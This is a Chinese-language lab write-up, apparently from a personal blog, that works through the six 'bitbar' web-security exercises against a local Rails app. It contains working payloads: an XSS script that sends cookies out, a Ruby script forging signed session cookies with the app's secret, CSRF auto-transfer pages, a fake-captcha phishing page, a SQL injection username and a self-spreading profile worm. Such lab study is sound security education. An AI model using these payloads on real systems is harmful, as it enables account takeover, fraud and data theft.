bitbar渗透实验 - Raye's Journey

bitbar渗透实验

给的是一个比特币交易的网站，本地搭建环境之后开始按照文章中的要求来完成6次attack

网站源码和代码都放在这个仓库了 https://github.com/xinyongpeng/bitbar

Attack 1: Warm-up exercise: Cookie Theft

根据路由

1
  get 'profile' => 'userview_profile'

定位到函数

1
  def view_profile
2
    @username = params[:username]
3
    @user = User.find_by_username(@username)
4
    if not @user
5
      if @username and @username != ""
6
        @error = "User {@username} not found"
7
      elsif logged_in?
8
        @user = @logged_in_user
9
      end
10
    end
11

12
    render :profile
13
  end

可以看到，输入的 username 被直接给打印出来，那么自然就存在XSS漏洞了。

payload

1
<script type="text/javascript">(new Image()).src="http://localhost:3000/steal_cookie?cookie="+document.cookie</script>

或者使用 xmlhttprequest 发送

1
<script type="text/javascript">var x = new XMLHttpRequest();x.open("GET", "http://localhost:3000/steal_cookie?cookie="+(document.cookie));x.send()</script>

Attack 2: Session hijacking with Cookies

参考这篇文章

上图说明了原始的 Session 对象 Session Data 是如何最终生成 Cookie 的

原来的加密过程：

序列化
填充，aes-cbc加密，结果用base64编码
hmac-sha1签名
将加密的数据和签名通过 -- 连接

但是意外地发现，bitbar的cookie并没有aes加密，可以通过

base64解码
反序列化

得到原始信息，那么这么一来，就只需要绕过验签这一个障碍了

在 config/initializers/secret_token.rb 中

1
 Be sure to restart your server when you modify this file.
2

3
 Your secret key is used for verifying the integrity of signed cookies.
4
 If you change this key, all old signed cookies will become invalid!
5

6
 Make sure the secret is at least 30 characters and all random,
7
 no regular words or you'll be exposed to dictionary attacks.
8
 You can use `rake secret` to generate a secure secret key.
9

10
 Make sure your secret_key_base is kept private
11
 if you're sharing your code publicly.
12
Bitbar::Application.config.secret_token = '0a5bfbbb62856b9781baa6160ecfd00b359d3ee3752384c2f47ceb45eada62f24ee1cbb6e7b0ae3095f70b0a302a2d2ba9aadf7bc686a49c8bac27464f9acb08'

这就是hmac-sha1的加解密密钥

ok，到此为止我们就能伪造数据了

attacke用户登陆，获取到当前的cookie
修改cookie值

这里需要用到 mechanize 这个包，安装

1
gem install mechanize

模拟登陆实现

1
agent = Mechanize.new 实例化对象
2
url = "http://localhost:3000/login"
3

4
page = agent.get(url)  获得网页
5

6
form = page.forms.first  第一个表单
7
form['username'] = form['password'] = 'attacker'  填写表单，用户名和密码都是attacker
8
agent.submit form  提交表单

这就相当于登陆了，然后我们获得cookie信息

1
cookie = agent.cookie_jar.jar['localhost']['/'][SESSION].to_s.sub("{SESSION}=", '')
2
cookie_value, cookie_signature = cookie.split('--')
3
raw_session = Base64.decode64(cookie_value)
4
session = Marshal.load(raw_session)

session如下:

1
{"session_id"=>"66ef9a22ca26e27ea4d3018b12c07999", "token"=>"q2VXDRnMskkf-69Gu2PiTg", "logged_in_id"=>4}

很明显，我们只需要修改 logged_in_id 为1即可

1
session['logged_in_id'] = 1
2
cookie_value = Base64.encode64(Marshal.dump(session)).split.join  get rid of newlines
3
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, RAILS_SECRET, cookie_value)
4
cookie_full = "{SESSION}={cookie_value}--{cookie_signature}"
5

6
puts "document.cookie='{cookie_full}';"

这时候得到的session

1
document.cookie='_bitbar_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJTY2ZWY5YTIyY2EyNmUyN2VhNGQzMDE4YjEyYzA3OTk5BjsAVEkiCnRva2VuBjsARkkiG3EyVlhEUm5Nc2trZi02OUd1MlBpVGcGOwBGSSIRbG9nZ2VkX2luX2lkBjsARmkG--935e2e8f9f3d190f2ffccdf9cafd9e4480319054';

然后再发送数据，比如访问 http://localhost:3000/profile

1
url = URI('http://localhost:3000/profile')
2

3
http = Net::HTTP.new(url.host, url.port)
4

5
header = {'Cookie':cookie_full}
6
response = http.get(url,header)
7
puts response.body

此时我们就能看到，

浏览器已经认为我们是 user1 了

完整代码

1
require 'mechanize'
2
require 'net/http'
3
SESSION = '_bitbar_session'
4
RAILS_SECRET = '0a5bfbbb62856b9781baa6160ecfd00b359d3ee3752384c2f47ceb45eada62f24ee1cbb6e7b0ae3095f70b0a302a2d2ba9aadf7bc686a49c8bac27464f9acb08'
5

6
agent = Mechanize.new
7
url = "http://localhost:3000/login"
8

9
page = agent.get(url)
10

11
form = page.forms.first
12
form['username'] = form['password'] = 'attacker'
13
agent.submit form
14

15
cookie = agent.cookie_jar.jar['localhost']['/'][SESSION].to_s.sub("{SESSION}=", '')
16
cookie_value, cookie_signature = cookie.split('--')
17
raw_session = Base64.decode64(cookie_value)
18
session = Marshal.load(raw_session)
19

20
puts session
21
session['logged_in_id'] = 1
22
cookie_value = Base64.encode64(Marshal.dump(session)).split.join  get rid of newlines
23
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, RAILS_SECRET, cookie_value)
24
cookie_full = "{SESSION}={cookie_value}--{cookie_signature}"
25

26
url = URI('http://localhost:3000/profile')
27

28
http = Net::HTTP.new(url.host, url.port)
29

30
header = {'Cookie':cookie_full}
31
response = http.get(url,header)
32
puts response.body

Attack 3: Cross-site Request Forgery

分析，登陆 user1,向attacker转帐，抓到的数据包如下

可见，只需要构造一个表单自动提交即可

b.html 内容如下

1
<!DOCTYPE html>
2
<html lang="en">
3
<head>
4
    <meta charset="UTF-8">
5
    <title>Document</title>
6
</head>
7
<body>
8

9
    <form action="http://localhost:3000/post_transfer" method="post" enctype="application/x-www-form-urlencoded" id="pay">
10
        < input type="hidden" name="destination_username" value="attacker">
11
        < input type="hidden" name="quantity" value=10>
12
    </form>
13

14
    <script type="text/javascript">
15
        function validate(){
16
            document.getElementById("pay").submit();
17
        }
18
        window.load = validate();
19
        setTimeout(function(){window.location = "http://baidu.com";}, 0.1);
20
        </script>
21
</body>
22
</html>

表单的字段都是隐藏的，并且值都是给定的，之后通过

1
document.getElementById("pay").submit();

实现自动提交

最后

1
setTimeout(function(){window.location = "http://baidu.com";}, 0.1);

0.1s 后跳转到百度首页

也可以使用 xmlhttprequest ，一样的思路

1
<html>
2
  <body>
3
    <script>
4
      var request = new XMLHttpRequest();
5
      request.open("POST", "http://localhost:3000/post_transfer");
6
      request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
7
      request.withCredentials = true;
8
      try {
9
        request.send("quantity=10&destination_username=attacker");
10
      } catch (err) {
11
        //
12
      } finally {
13
        window.location = "http://baidu.com/";
14
      }
15
    </script>
16
  </body>
17
</html>

Attack 4: Cross-site request forgery with user assistance

由于 http://localhost:3000/super_secure_transfer 转账的时候，表单带上了一个随机token，所以没办法通过 CSRF 来转帐，只能通过钓鱼的办法，欺骗用户输入自己的 Super Secret Token,这样我们就能绕过服务器的校验了

bp2.html 可以使用上一个的代码

1
bp.html
2
<html>
3
  <head>
4
    <title>23333</title>
5
  </head>
6
  <body>
7
    <style type="text/css">
8
      iframe {
9
      width: 100%;
10
      height: 100%;
11
      border: none;
12
      }
13
    </style>
14
    <script></script>
15
    <iframe src="bp2.html" scrolling="no"></iframe>
16
  </body>
17
</html>
18
bp2.html
19
<p>请输入 super_secure_post_transfer 页面下的 Super Secret Token 来证明你不是机器人</p>
20

21
< input id="token" type="text" placeholder="Captcha">
22
<button onClick="gotEm()">Confirm</button>
23

24
<script>
25
function gotEm() {
26
  var token = document.getElementById("token").value;
27
  var request = new XMLHttpRequest();
28
  request.open("POST", "http://localhost:3000/super_secure_post_transfer", false);
29
  request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
30
  request.withCredentials = true;
31
  try {
32
    request.send("quantity=10&destination_username=attacker&tokeninput=" + token);
33
  } catch (err) {
34
    // Do nothing on inevitable XSS error
35
  } finally {
36
    window.top.location = "http://baidu.com";
37
  }
38
}
39
</script>

Attack 5: Little Bobby Tables (aka SQL Injection)

删除用户的逻辑如下

1
  def post_delete_user
2
    if not logged_in?
3
      render "main/must_login"
4
      return
5
    end
6

7
    @username = @logged_in_user.username
8
    User.destroy_all("username = '{@username}'")
9

10
    reset_session
11
    @logged_in_user = nil
12
    render "user/delete_user_success"
13
  end

可以看到输入的用户名没有经过任何的过滤直接拼接到了SQL语句中，我们看到后台执行的SQL语句

如果我们的用户名中含有user3即可将user3删除

那么如果我们注册用户

1
user3' or username GLOB 'user3?*

拼接出来的SQL语句必然是

1
delete from users where username = user3 or username GLOB 'user3?*'

登陆

删除

此时可以看到后台执行的SQL语句

Attack 6: Profile Worm

问题出在渲染用户的profile上面

profile.html.erb 中，渲染用户的 profile 代码如下

1
    <% if @user.profile and @user.profile != "" %>
2
        <div id="profile"><%= sanitize_profile(@user.profile) %></div>
3
    <% end %>

调用了函数 sanitize_profile

1
  def sanitize_profile(profile)
2
    return sanitize(profile, tags: %w(a br b h1 h2 h3 h4 i img li ol p strong table tr td th u ul em span), attributes: %w(id class href colspan rowspan src align valign))
3
  end

其中 santitize 函数，通过 tags 和 attributes 可以指定允许的标签和属性白名单。

然而属性中出现了 href,这意味着我们可以使用JavaScript伪协议来XSS

参考： https://ruby-china.org/topics/28760

比如

1
<strong id="bitbar_count" class="javascript:alert(1)"></strong>

更新自己的 profile 时，查看自己的profile，即可弹窗

如果有用户浏览当前的profile，那么将会发生两个操作

转账操作
更新用户的profile

转账操作的代码如下

1
var request = new XMLHttpRequest();
2
request.open("POST", "http://localhost:3000/post_transfer");
3
request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
4
request.withCredentials = true;
5
try {
6
    request.send("quantity=1&destination_username=attacker");
7
} catch (err) {
8
//
9
} finally {
10
    //xxxx 带执行的操作
11
}

转帐完成之后，我们需要立即更新当前浏览用户的 profile

设置 profile 的数据包如下

只需要向路由 /set_profile 发送请求即可

1
request = new XMLHttpRequest();
2
request.open("POST", "http://localhost:3000/set_profile", true);
3
request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
4
request.withCredentials = true;
5
request.send("new_profile=".concat(escape(document.getElementById('hax-wrap').outerHTML)));

遇到的问题：

发送的数据含有html转移后的 & 符号。如图

这里我采用的是 String.fromCharCode() 来将其做一次转换

字符串拼接只能用 concat 而不能用 + ，因为 + 号在 html 中是空格的意思

最后的代码

1
<span id="wrap">
2
<span id="bitbar_count" class="eval(document['getElementById']('pxy')['innerHTML'])"></span>
3
<span id="pxy">
4
document.getElementById('pxy').style.display = "none";
5
setTimeout(function(){
6

7
    var request = new XMLHttpRequest();
8
    request.open("POST", "http://localhost:3000/post_transfer");
9
    request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
10
    request.withCredentials = true;
11
    try {
12
        request.send("quantity=1".concat(String.fromCharCode(38)).concat("destination_username=attacker"));
13
    } catch (err) {
14
    //
15
    } finally {
16
        request = new XMLHttpRequest();
17
        request.open("POST", "http://localhost:3000/set_profile", true);
18
        request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
19
        request.withCredentials = true;
20
        request.send("new_profile=".concat(escape(document.getElementById('wrap').outerHTML)));
21
    }
22

23
}, 0);
24
10;
25
</span>
26
<p>233333</p>
27
</span>

ps: 也可以用 js 动态创建 form表单的方式，但是这样页面是会跳转的，无法满足

在转账和profile的赋值过程中，浏览器的地址栏需要始终停留在http://localhost:3000/profile?username=x ，其中x是profile被浏览的用户名。

附上js动态创建form表单的代码

1
<span id="wrap">
2
<strong id="bitbar_count" class="eval((document['getElementById']('pxy').innerHTML))"></strong>
3
<span id="pxy">
4
document.getElementById('pxy').style.display = "none";
5
function makeForm(){
6
    var form = document.createElement("form");
7
    form.id = "pay";
8

9
    document.body.appendChild(form);
10
    var input = document.createElement("input");
11
    input.type = "text";
12

13
    input.name =  "destination_username";
14
    input.value = "attacker";
15
    input.type = 'hidden';
16

17
    form.appendChild(input);
18
    var input2 = document.createElement("input");
19
    input2.type = "hidden";
20
    input2.name = "quantity";
21
    input2.value = 10
22

23
    form.appendChild(input2);
24
    form.action = "http://localhost:3000/post_transfer";
25
    form.method = "POST";
26
    form.enctype = "application/x-www-form-urlencode";
27
    form.submit();
28
}
29
makeForm();
30
request = new XMLHttpRequest();
31
request.open("POST", "http://localhost:3000/set_profile", true);
32
request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
33
request.withCredentials = true;
34
request.send("new_profile=".concat(escape(document.getElementById('wrap').outerHTML)));
35
</span>
36
</span>